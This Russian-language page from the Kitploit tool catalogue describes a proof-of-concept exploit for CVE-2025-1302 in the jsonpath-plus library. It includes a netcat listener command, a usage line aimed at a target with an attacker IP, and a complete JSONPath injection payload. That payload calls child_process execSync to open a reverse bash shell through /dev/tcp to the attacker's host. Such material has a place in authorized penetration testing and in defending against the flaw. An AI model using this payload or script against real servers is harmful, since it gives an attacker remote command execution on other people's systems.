Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — PoC эксплойт и демонстрация уязвимого сервера для CVE-2025-1302 в jsonpath-plus. | Kitploit
Инструменты/GitHubGitHub/abrewer251
/
cve-2025-1302_jsonpath-plus_rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

PoC эксплойт и демонстрация уязвимого сервера для CVE-2025-1302 в jsonpath-plus.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-1302 JSONPath-Plus RCE PoC

Название скрипта PoC: poc.py

Скрипт эксплойта Proof-of-Concept для CVE-2025-1302, который нацелен на уязвимость RCE в библиотеке jsonpath-plus. При запуске против уязвимой конечной точки сервиса скрипт пытается инициировать удаленное выполнение кода через полезную нагрузку JSONPath и установить обратную оболочку обратно к атакующему.


Возможности

  • Гибкие HTTP-методы: поддерживает POST, GET или AUTO (POST с резервным GET) через флаги --method или --no-fallback.
  • Пользовательские полезные нагрузки: загрузите один или несколько шаблонов полезных нагрузок RCE JSONPath из файла с шаблонами {ip} и {port}.
  • Встроенная полезная нагрузка по умолчанию: если файл полезной нагрузки не указан, используется полностью сформированный шаблон обратной оболочки bash.
  • Подробная отладка: выводит полные тела запросов/ответов как для POST, так и для GET попыток при их неудаче.
  • Индикаторы прогресса: отображает циклы задержки и полезной нагрузки с индикаторами выполнения tqdm.
  • Логирование: опционально сохраняет все результаты в JSON-файл с помощью --output.
  • Установка

    1. Клонируйте этот репозиторий:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. Установите зависимости (требуется Python 3.6+):

      root@kitploit:~
      pip install -r requirements.txt
      

    Использование

    1. Запустите слушатель на вашей атакующей машине (замените порт при необходимости):

      root@kitploit:~
      nc -lvnp 9999
      
    2. Запустите PoC:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: Файл, содержащий одну полезную нагрузку JSONPath на строку. Используйте плейсхолдеры {ip} и {port}.
    • --delay: Секунды ожидания перед отправкой полезных нагрузок (показывает обратный отсчет).
    • --method: Принудительный выбор POST, GET или AUTO (по умолчанию).
    • --no-fallback: Сокращение для пропуска любых повторных попыток GET (эквивалентно --method POST).
    • --output: Путь для сохранения JSON-лога попыток.

    Пример файла полезной нагрузки

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    Вклад

    1. Форкните репозиторий и создайте ветку для функции.
    2. Отправьте pull request с вашими изменениями.

    Отказ от ответственности

    Используйте этот скрипт только в контролируемых лабораторных средах против систем, которыми вы владеете или на тестирование которых имеете явное разрешение. Злоупотребление может быть незаконным и неэтичным.

    Скачать инструмент